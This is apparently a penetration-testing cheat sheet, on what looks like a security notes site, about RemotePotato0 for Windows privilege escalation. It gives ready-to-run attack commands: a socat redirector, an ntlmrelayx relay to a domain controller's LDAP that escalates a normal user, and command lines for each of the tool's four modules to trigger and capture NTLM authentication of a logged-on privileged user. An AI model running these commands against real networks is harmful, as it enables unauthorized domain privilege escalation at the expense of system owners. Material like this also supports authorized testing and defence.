According to the RemotePotato0's README, it abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user).

We can download the executable from https://github.com/antonioCoco/RemotePotato0.

Module 0 (`-m 0`: Rpc2Http cross protocol relay server + potato trigger)

# In attack machine
sudo socat tcp-listen:135,fork,reuseaddr tcp:<target-ip>:9999 &
sudo ntlmrelayx.py -t ldap://<target-dc-ip> --no-wcf-server --escalate-user normal_user

# In target machine
# -m 0: Module (Rpc2Http cross protocol relay server + potato trigger)
# -r: Remote HTTP relay server
# -x: Rogue Oxid resolver ip
# -p: Rogue Oxid resolver port
# -s: Session id for the Cross Session Activation Attack
.\RemotePotato0.exe -m 0 -r <attack-ip> -x <attack-ip> -p 9999 -s 1

Module 1 (`-m 1`: Rpc2Http cross protocol relay server)

# -l: RPC Relay server listening port
.\RemotePotato0.exe -m 1 -l 9997 -r <attack-ip>

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 (`-m 2`: Rpc capture server + potato trigger)

query user
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1

Module 3 (`-m 3`: Rpc capture server)

.\RemotePotato0.exe -m 3 -l 9997

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

References

https://github.com/antonioCoco/RemotePotato0

Active Directory

Protocol

Service

Privilege Escalation

Post Exploitation

Forensics

PowerShell

WSL

Technique

Windows PrivEsc with RemotePotato

Exploit

Module 0 (-m 0: Rpc2Http cross protocol relay server + potato trigger)

Module 1 (-m 1: Rpc2Http cross protocol relay server)

Module 2 (-m 2: Rpc capture server + potato trigger)

Module 3 (-m 3: Rpc capture server)

References

ON THIS PAGE

Module 0 (`-m 0`: Rpc2Http cross protocol relay server + potato trigger)

Module 1 (`-m 1`: Rpc2Http cross protocol relay server)

Module 2 (`-m 2`: Rpc capture server + potato trigger)

Module 3 (`-m 3`: Rpc capture server)